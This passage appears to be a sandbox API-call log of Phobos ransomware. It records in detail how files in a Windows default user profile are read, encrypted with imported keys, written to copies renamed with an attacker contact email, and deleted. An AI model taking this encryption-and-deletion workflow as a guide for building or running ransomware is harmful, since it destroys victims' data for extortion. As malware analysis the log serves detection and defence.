Files\\desktop.ini.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows\\temporary internet files\\desktop.ini.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0201.128] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\desktop.ini" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows\\temporary internet files\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x100 [0201.128] SetFilePointerEx (in: hFile=0x100, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0201.128] SetFilePointerEx (in: hFile=0x100, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0201.128] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\desktop.ini.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows\\temporary internet files\\desktop.ini.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xfc [0201.128] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32a28) returned 1 [0201.128] CryptSetKeyParam (hKey=0xa32a28, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0201.128] ReadFile (in: hFile=0x100, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x43, lpOverlapped=0x0) returned 1 [0201.129] CryptEncrypt (in: hKey=0xa32a28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x50, dwBufLen=0x50 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x50) returned 1 [0201.129] WriteFile (in: hFile=0xfc, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x50, lpOverlapped=0x0) returned 1 [0201.130] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32928) returned 1 [0201.130] CryptSetKeyParam (hKey=0xa32928, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0201.130] CryptEncrypt (in: hKey=0xa32928, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0201.130] CryptDestroyKey (hKey=0xa32928) returned 1 [0201.130] WriteFile (in: hFile=0xfc, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0201.130] CryptDestroyKey (hKey=0xa32a28) returned 1 [0201.130] CloseHandle (hObject=0x100) returned 1 [0201.130] CloseHandle (hObject=0xfc) returned 1 [0201.130] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\desktop.ini" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows\\temporary internet files\\desktop.ini")) returned 1 [0201.131] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0201.131] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows\\UsrClass.dat" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows\\usrclass.dat"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xfc [0201.132] GetFileSizeEx (in: hFile=0xfc, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=262144) returned 1 [0201.132] CloseHandle (hObject=0xfc) returned 1 [0201.132] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows\\UsrClass.dat" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows\\usrclass.dat")) returned 0x2022 [0201.132] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows\\UsrClass.dat.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows\\usrclass.dat.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0201.132] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows\\UsrClass.dat" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows\\usrclass.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xfc [0201.132] SetFilePointerEx (in: hFile=0xfc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0201.132] SetFilePointerEx (in: hFile=0xfc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0201.132] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows\\UsrClass.dat.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows\\usrclass.dat.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x100 [0201.132] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32a28) returned 1 [0201.132] CryptSetKeyParam (hKey=0xa32a28, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0201.132] ReadFile (in: hFile=0xfc, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x40000, lpOverlapped=0x0) returned 1 [0201.315] CryptEncrypt (in: hKey=0xa32a28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40010, dwBufLen=0x40010 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40010) returned 1 [0201.317] WriteFile (in: hFile=0x100, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x40010, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x40010, lpOverlapped=0x0) returned 1 [0201.324] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32928) returned 1 [0201.324] CryptSetKeyParam (hKey=0xa32928, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0201.324] CryptEncrypt (in: hKey=0xa32928, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0201.324] CryptDestroyKey (hKey=0xa32928) returned 1 [0201.324] WriteFile (in: hFile=0x100, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0201.324] CryptDestroyKey (hKey=0xa32a28) returned 1 [0201.324] CloseHandle (hObject=0xfc) returned 1 [0201.324] CloseHandle (hObject=0x100) returned 1 [0201.324] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows\\UsrClass.dat" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows\\usrclass.dat")) returned 1 [0201.326] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0201.326] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\edb.log" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\edb.log"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x100 [0201.329] GetFileSizeEx (in: hFile=0x100, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=2097152) returned 1 [0201.329] CloseHandle (hObject=0x100) returned 1 [0201.329] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\edb.log" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\edb.log")) returned 0x2020 [0201.329] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\edb.log" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\edb.log"), lpNewFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\edb.log.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\edb.log.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 1 [0201.330] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\edb.log.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\edb.log.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x100 [0201.330] SetFilePointerEx (in: hFile=0x100, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc40 | out: lpNewFilePointer=0x0) returned 1 [0201.330] SetFilePointerEx (in: hFile=0x100, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc40 | out: lpNewFilePointer=0x0) returned 1 [0201.330] ReadFile (in: hFile=0x100, lpBuffer=0x34b0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x2f4fc4c, lpOverlapped=0x0 | out: lpBuffer=0x34b0058*, lpNumberOfBytesRead=0x2f4fc4c*=0x40000, lpOverlapped=0x0) returned 1 [0201.348] SetFilePointerEx (in: hFile=0x100, liDistanceToMove=0xaaaaa, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc40 | out: lpNewFilePointer=0x0) returned 1 [0201.348] ReadFile (in: hFile=0x100, lpBuffer=0x34f0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x2f4fc4c, lpOverlapped=0x0 | out: lpBuffer=0x34f0058*, lpNumberOfBytesRead=0x2f4fc4c*=0x40000, lpOverlapped=0x0) returned 1 [0201.425] SetFilePointerEx (in: hFile=0x100, liDistanceToMove=0x1c0000, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc40 | out: lpNewFilePointer=0x0) returned 1 [0201.425] ReadFile (in: hFile=0x100, lpBuffer=0x3530058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x2f4fc4c, lpOverlapped=0x0 | out: lpBuffer=0x3530058*, lpNumberOfBytesRead=0x2f4fc4c*=0x40000, lpOverlapped=0x0) returned 1 [0201.497] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc30, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc9c | out: phKey=0x2f4fc9c*=0xa32928) returned 1 [0201.497] CryptSetKeyParam (hKey=0xa32928, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0201.497] CryptEncrypt (in: hKey=0xa32928, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc50*=0xc0050, dwBufLen=0xc0050 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc50*=0xc0050) returned 1 [0201.503] CryptDestroyKey (hKey=0xa32928) returned 1 [0201.503] SetFilePointerEx (in: hFile=0x100, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc78 | out: lpNewFilePointer=0x0) returned 1 [0201.503] WriteFile (in: hFile=0x100, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xc0102, lpNumberOfBytesWritten=0x2f4fc88, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc88*=0xc0102, lpOverlapped=0x0) returned 1 [0201.525] SetEndOfFile (hFile=0x100) returned 1 [0201.525] SetFilePointerEx (in: hFile=0x100, liDistanceToMove=0x1c0000, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc48 | out: lpNewFilePointer=0x0) returned 1 [0201.525] WriteFile (in: hFile=0x100, lpBuffer=0x357013a*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x2f4fc54, lpOverlapped=0x0 | out: lpBuffer=0x357013a*, lpNumberOfBytesWritten=0x2f4fc54*=0x40000, lpOverlapped=0x0) returned 1 [0201.526] SetFilePointerEx (in: hFile=0x100, liDistanceToMove=0xaaaaa, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc48 | out: lpNewFilePointer=0x0) returned 1 [0201.526] WriteFile (in: hFile=0x100, lpBuffer=0x357013a*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x2f4fc54, lpOverlapped=0x0 | out: lpBuffer=0x357013a*, lpNumberOfBytesWritten=0x2f4fc54*=0x40000, lpOverlapped=0x0) returned 1 [0201.537] SetFilePointerEx (in: hFile=0x100, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc48 | out: lpNewFilePointer=0x0) returned 1 [0201.537] WriteFile (in: hFile=0x100, lpBuffer=0x357013a*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x2f4fc54, lpOverlapped=0x0 | out: lpBuffer=0x357013a*, lpNumberOfBytesWritten=0x2f4fc54*=0x40000, lpOverlapped=0x0) returned 1 [0201.538] CloseHandle (hObject=0x100) returned 1 [0201.538] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0201.538] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\oeold.xml" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\oeold.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x100 [0201.540] GetFileSizeEx (in: hFile=0x100, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=260) returned 1 [0201.540] CloseHandle (hObject=0x100) returned 1 [0201.540] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\oeold.xml" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\oeold.xml")) returned 0x2020 [0201.540] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\oeold.xml.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\oeold.xml.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0201.540] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\oeold.xml" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\oeold.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x100 [0201.540] SetFilePointerEx (in: hFile=0x100, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0201.540] SetFilePointerEx (in: hFile=0x100, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0201.540] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\oeold.xml.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\oeold.xml.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x160 [0201.541] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32928) returned 1 [0201.541] CryptSetKeyParam (hKey=0xa32928, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0201.541] ReadFile (in: hFile=0x100, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x104, lpOverlapped=0x0) returned 1 [0201.542] CryptEncrypt (in: hKey=0xa32928, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x110, dwBufLen=0x110 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x110) returned 1 [0201.542] WriteFile (in: hFile=0x160, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x110, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x110, lpOverlapped=0x0) returned 1 [0201.542] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32868) returned 1 [0201.542] CryptSetKeyParam (hKey=0xa32868, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0201.542] CryptEncrypt (in: hKey=0xa32868, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0201.542] CryptDestroyKey (hKey=0xa32868) returned 1 [0201.542] WriteFile (in: hFile=0x160, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0201.543] CryptDestroyKey (hKey=0xa32928) returned 1 [0201.543] CloseHandle (hObject=0x100) returned 1 [0201.543] CloseHandle (hObject=0x160) returned 1 [0201.543] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\oeold.xml" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\oeold.xml")) returned 1 [0201.543] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0201.544] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Bears.htm" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\stationery\\bears.htm"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x160 [0201.632] GetFileSizeEx (in: hFile=0x160, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=255) returned 1 [0201.632] CloseHandle (hObject=0x160) returned 1 [0201.632] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Bears.htm" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\stationery\\bears.htm")) returned 0x2020 [0201.632] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Bears.htm.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\stationery\\bears.htm.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0201.632] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Bears.htm" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\stationery\\bears.htm"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x160 [0201.632] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0201.633] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0201.633] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Bears.htm.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\stationery\\bears.htm.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x100 [0201.696] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32928) returned 1 [0201.696] CryptSetKeyParam (hKey=0xa32928, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0201.696] ReadFile (in: hFile=0x160, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0xff, lpOverlapped=0x0) returned 1 [0201.697] CryptEncrypt (in: hKey=0xa32928, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x100, dwBufLen=0x100 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x100) returned 1 [0201.697] WriteFile (in: hFile=0x100, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x100, lpOverlapped=0x0) returned 1 [0201.698] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32868) returned 1 [0201.698] CryptSetKeyParam (hKey=0xa32868, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0201.698] CryptEncrypt (in: hKey=0xa32868, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0201.698] CryptDestroyKey (hKey=0xa32868) returned 1 [0201.698] WriteFile (in: hFile=0x100, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0201.698] CryptDestroyKey (hKey=0xa32928) returned 1 [0201.698] CloseHandle (hObject=0x160) returned 1 [0201.698] CloseHandle (hObject=0x100) returned 1 [0201.698] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Bears.htm" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\stationery\\bears.htm")) returned 1 [0201.699] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0201.699] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Bears.jpg" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\stationery\\bears.jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x100 [0201.699] GetFileSizeEx (in: hFile=0x100, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=1074) returned 1 [0201.699] CloseHandle (hObject=0x100) returned 1 [0201.700] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Bears.jpg" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\stationery\\bears.jpg")) returned 0x2020 [0201.700] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Bears.jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\stationery\\bears.jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0201.700] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Bears.jpg" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\stationery\\bears.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x100 [0201.700] SetFilePointerEx (in: hFile=0x100, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0201.700] SetFilePointerEx (in: hFile=0x100, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0201.700] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Bears.jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\stationery\\bears.jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x160 [0201.701] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32928) returned 1 